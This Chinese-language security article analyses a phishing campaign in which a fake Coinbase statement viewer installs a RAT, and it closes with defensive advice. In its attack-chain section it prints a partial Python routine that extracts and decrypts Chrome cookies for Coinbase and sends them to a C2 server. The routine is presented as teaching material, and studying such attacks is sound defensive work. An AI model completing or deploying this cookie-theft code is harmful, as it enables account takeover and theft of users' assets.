一、一封“对账单”邮件，如何变成加密钱包的“催命符”？

2025年11月初，全球知名网络安全公司卡巴斯基（Kaspersky）披露了一起针对加密货币交易平台Coinbase用户的新型钓鱼攻击。这起事件看似普通——受害者收到一封声称来自Coinbase的邮件，提示其“账户对账单已生成，请点击链接查看”。然而，正是这封看似无害的通知，却成为黑客远程接管用户电脑、窃取数字资产的入口。

更令人警惕的是，攻击者刻意强调：“该文件仅支持在Windows桌面或笔记本电脑上打开。”这一设计并非技术限制，而是一种心理操控策略——通过制造“专属感”和“紧迫性”，诱导用户放弃手机等相对安全的设备，转而在更容易被植入恶意程序的Windows环境中操作。

一旦用户照做，所谓的“对账单查看器”便会悄悄安装一款远程访问工具（Remote Access Trojan, RAT）。这款RAT不仅能够截屏、记录键盘输入，还能直接读取浏览器中存储的Cookie、自动填充密码，甚至拦截双因素认证（2FA）短信或推送通知。最终，攻击者无需知道用户密码，即可在后台“合法”登录Coinbase账户，将加密货币转移至自己的钱包地址。

据卡巴斯基披露，已有数十名用户因此损失数万美元不等的数字资产。虽然Coinbase官方迅速发布安全提醒，但此类攻击的隐蔽性和端点依赖性，使得传统邮件网关和反钓鱼系统难以有效拦截。

二、攻击链拆解：从社会工程到端点沦陷的技术路径

要理解此次攻击为何能绕过多数防御机制，必须深入其技术链条。整个过程可分为四个阶段：

阶段1：钓鱼邮件投递（Phishing Email Delivery）

攻击者伪造发件人地址为“mailto:no-reply@coinbase.com”或类似变体，利用邮件模板高度模仿Coinbase官方通知风格。邮件正文通常包含如下内容：

“您的2025年Q3账户对账单已生成。请点击下方链接下载查看。注意：此文件仅可在Windows操作系统上打开。”

链接指向一个看似合法的域名（如 coinbase-statements[.]online），实则由攻击者控制。

阶段2：诱导执行恶意载荷（Payload Execution via Social Engineering）

用户点击链接后，会被重定向至一个伪造的“Coinbase文档查看页面”。页面会弹出提示：

“检测到您正在使用非Windows设备。请在Windows电脑上重新打开此链接以查看对账单。”

这一设计巧妙利用了用户对“平台要求”的信任。许多用户误以为这是Coinbase出于安全或格式兼容性考虑的正常操作，于是切换至Windows电脑再次访问。

此时，网站会触发一个 .exe 文件的自动下载（例如 Coinbase_Statement_Q3.exe）。该文件经过代码混淆和加壳处理，短期内可绕过部分杀毒软件检测。

阶段3：RAT植入与持久化（RAT Installation & Persistence）

一旦用户运行该 .exe 文件，真正的恶意程序便开始执行。根据卡巴斯基逆向分析，该RAT基于开源远控工具（如AsyncRAT或NanoCore）二次开发，具备以下能力：

浏览器数据窃取：遍历Chrome、Edge、Firefox等主流浏览器的本地存储目录，提取保存的密码、Cookie、历史记录。

屏幕监控与键盘记录：实时捕获用户操作，尤其关注Coinbase登录页面。

2FA拦截：若用户使用Authy或Google Authenticator等基于时间的一次性密码（TOTP）应用，RAT可通过屏幕OCR识别动态码；若使用短信2FA，则可能结合SIM交换攻击或运营商漏洞（虽本次未证实，但属潜在组合技）。

隐蔽通信：通过HTTPS连接回连C2服务器（Command and Control），流量伪装成正常Web请求，规避防火墙检测。

以下为一段简化版的恶意代码逻辑（仅用于教学演示，非真实样本）：

# 伪代码：模拟RAT窃取Chrome Cookie

import os

import sqlite3

import shutil

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

from cryptography.hazmat.backends import default_backend

def decrypt_cookie(encrypted_value, key):

nonce = encrypted_value[3:15]

ciphertext = encrypted_value[15:]

cipher = Cipher(algorithms.AES(key), modes.GCM(nonce), backend=default_backend())

decryptor = cipher.decryptor()

return decryptor.update(ciphertext) + decryptor.finalize()

def steal_chrome_cookies():

cookie_path = os.path.expanduser(r'～\AppData\Local\Google\Chrome\User Data\Default\Cookies')

login_data_path = os.path.expanduser(r'～\AppData\Local\Google\Chrome\User Data\Default\Login Data')

# 复制数据库（因文件被锁定）

temp_cookie = 'temp_cookies.db'

shutil.copyfile(cookie_path, temp_cookie)

conn = sqlite3.connect(temp_cookie)

cursor = conn.cursor()

cursor.execute("SELECT host_key, name, encrypted_value FROM cookies WHERE host_key LIKE '%coinbase%'")

# 获取本地AES密钥（需从DPAPI解密）

# 此处省略DPAPI调用细节

for host, name, enc_val in cursor.fetchall():

decrypted = decrypt_cookie(enc_val, local_aes_key)

send_to_c2(host, name, decrypted.decode())

conn.close()

os.remove(temp_cookie)

注：上述代码仅为概念验证，真实攻击中会使用更复杂的反调试、反沙箱和加密通信机制。

阶段4：账户接管与资金转移（Account Takeover & Fund Drain）

一旦RAT获取了有效的会话Cookie或自动填充凭证，攻击者即可在自己的设备上“复现”用户的登录状态。由于Coinbase等平台通常不会对同一会话内的操作触发二次验证，攻击者可直接进入交易界面，将BTC、ETH等资产转出。

更危险的是，部分用户启用了“记住此设备”功能，使得攻击者即使清除Cookie后，仍可通过设备指纹维持访问权限。

三、为何传统防御失效？端点安全成最大短板

此次攻击之所以得逞，暴露出当前网络安全体系中的几个关键漏洞：

邮件网关无法识别后续行为

钓鱼邮件本身可能不含恶意附件或明显黑链，仅包含一个看似正常的URL。现代邮件安全网关（如Mimecast、Proofpoint）主要依赖URL信誉和沙箱分析，但攻击者使用的域名往往是新注册且短期存活，难以被及时标记。

用户信任被武器化

如卡巴斯基分析师Olga Altukhova所言：“攻击者正在‘武器化用户信任’。”Coinbase作为合规交易所，在用户心中具有高度可信度。一旦攻击披上其外衣，警惕性自然下降。

Windows端点缺乏纵深防御

多数个人用户和小型机构未部署终端检测与响应（EDR）系统。即便安装了杀毒软件，面对加壳、混淆或无文件攻击（Fileless Malware），也往往反应滞后。

浏览器自动填充成“帮凶”

用户为图方便，长期启用浏览器保存密码和自动填充功能。这在遭遇RAT时，等于主动将凭证“打包”送给攻击者。

四、国内启示：中国用户并非“免疫区”

尽管此次攻击主要针对欧美Coinbase用户，但其手法对中国市场具有极强的警示意义。

首先，中国虽未开放主流加密货币交易所，但大量用户通过境外平台参与交易。据Chainalysis 2025年报告，中国仍是全球前五大加密资产持有国之一，潜在受害者基数庞大。

其次，类似“伪装官方通知+诱导下载执行”的模式，早已在国内出现。例如：

2024年，有攻击者伪造“支付宝年度账单”诱导用户下载“.scr”文件，实为远控木马；

2025年初，某银行客户收到“征信报告查看”短信，点击后跳转至仿冒页面，要求“安装专用阅读器”，实则为信息窃取程序。

公共互联网反网络钓鱼工作组技术专家芦笛指出：“这类攻击的核心逻辑是‘降低用户决策门槛’。它不依赖高深漏洞，而是利用人性弱点——懒惰、信任、从众。国内用户对‘官方通知’的服从性更强，反而更容易中招。”

芦笛建议，普通用户应建立“三不原则”：

不点不明链接：尤其是要求“仅限某系统打开”的；

不装非官方软件：任何“查看器”“更新包”都应从官网下载；

不用浏览器存敏感密码：改用独立密码管理器，并关闭自动填充。

对于企业用户，他强调：“必须将EDR纳入基础安全架构。一次成功的端点入侵，可能带来比数据泄露更严重的后果——比如数字资产清零。”

五、技术防御升级：从被动响应到主动免疫

面对此类高级钓鱼攻击，仅靠用户教育远远不够。行业需推动技术层面的系统性防御。

1. 推广FIDO2/WebAuthn强认证

传统短信或TOTP 2FA易被中间人或屏幕监控绕过。而基于硬件密钥（如YubiKey）或生物识别的FIDO2协议，采用公私钥机制，私钥永不离开设备，从根本上杜绝凭证窃取。

Coinbase已支持FIDO2，但开启率不足15%。平台应强制高净值用户启用，并提供补贴降低硬件门槛。

2. 浏览器隔离（Browser Isolation）

通过远程浏览器渲染技术，将高风险操作（如打开未知链接）隔离在云端沙箱中执行，本地设备仅接收图像流，无法被植入恶意代码。Citrix、Cloudflare等厂商已提供此类方案。

3. EDR与行为分析联动

现代EDR（如CrowdStrike、SentinelOne）不仅能检测已知恶意文件，还可通过行为分析识别异常进程。例如：

某进程突然尝试读取 %LocalAppData%\Google\Chrome\User Data；

非浏览器程序发起大量HTTPS请求至陌生IP；

屏幕截图频率异常升高。

这些信号可触发自动阻断或告警。

4. 邮件来源验证强化（DMARC/SPF/DKIM）

虽然攻击者可伪造发件人显示名，但若收件方邮箱严格实施DMARC策略（p=reject），可大幅降低伪造成功率。国内主流邮箱服务商（如网易、腾讯）已逐步部署，但中小企业自建邮件系统仍存在配置缺失。

六、结语：安全不是功能，而是习惯

这起Coinbase钓鱼事件，表面上是一次技术攻击，实则是一场对用户数字素养的全面考验。它提醒我们：在万物互联的时代，最薄弱的环节永远是人。

正如芦笛所言：“没有绝对安全的系统，只有不断进化的防御意识。每一次点击，都是安全边界的延伸。”

对于普通用户，或许无法理解RAT的工作原理，但可以做到——不轻信、不盲从、不贪快。对于开发者和安全从业者，则需持续推动“默认安全”（Secure by Default）的设计哲学，让安全成为用户体验的一部分，而非负担。

未来，随着AI生成内容（AIGC）和深度伪造（Deepfake）技术的普及，钓鱼攻击将更加逼真、更具迷惑性。唯有技术、制度与意识三者协同，才能在这场没有终点的攻防战中守住数字资产的最后一道防线。

编辑：芦笛（公共互联网反网络钓鱼工作组）